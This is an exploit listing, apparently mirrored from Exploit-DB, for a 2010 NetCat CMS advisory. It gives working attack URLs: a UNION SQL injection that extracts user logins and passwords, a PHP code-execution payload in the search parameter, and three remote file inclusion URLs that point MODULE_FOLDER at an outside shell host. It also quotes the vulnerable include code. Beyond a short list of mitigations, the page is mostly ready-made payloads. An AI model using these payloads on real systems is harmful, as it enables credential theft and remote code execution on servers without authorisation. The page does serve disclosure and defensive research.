header-logo
Suggest Exploit
vendor:
NetCat CMS
by:
brain[pillow]
7.5
CVSS
HIGH
SQL-injection, Code exec, Remote File Inclusion
89, 94, 98
CWE
Product Name: NetCat CMS
Affected Version From: UNKNOWN
Affected Version To: UNKNOWN
Patch Exists: YES
Related CWE: N/A
CPE: a:netcat:netcat_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

NetCat CMS Code exec, SQL-injection

On different versions of this software next vulnerabilities are availible: Sql-injection: /search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23 Code exec: /search/?action=index&text={${phpinfo()}} Remote File Inclusion: /netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://shell? /netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://shell? /netcat/modules/logging/function.inc.php?MODULE_FOLDER=http://shell?

Mitigation:

Input validation, Access control, Patching, Network segmentation, Web application firewall
Source

Exploit-DB raw data:

# Exploit Title: NetCat CMS Code exec, SQL-injection
# Google Dork: none
# Date: 28.11.2010
# Author: brain[pillow]
# Software Link: http://netcat.ru/
# Version: UNKNOWN

On different versions of this software next vulnerabilities are availible:

=======================================================
# Sql-injection:

/search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23

=======================================================
# Code exec:

/search/?action=index&text={${phpinfo()}}

# Remote File Inclusion:
=================================
# Vuln code example:
=================================

<?php
/* $Id: function.inc.php 3272 2009-05-25 14:34:42Z vadim $ */

// get global value (for admin mode)
global $MODULE_FOLDER;

// include need classes
include_once ($MODULE_FOLDER."filemanager/nc_filemanager.class.php");

?>

================================
# Three exploits:
================================

/netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/logging/function.inc.php?MODULE_FOLDER=http://shell?

Navigation

Suggest Exploit

Services By CQR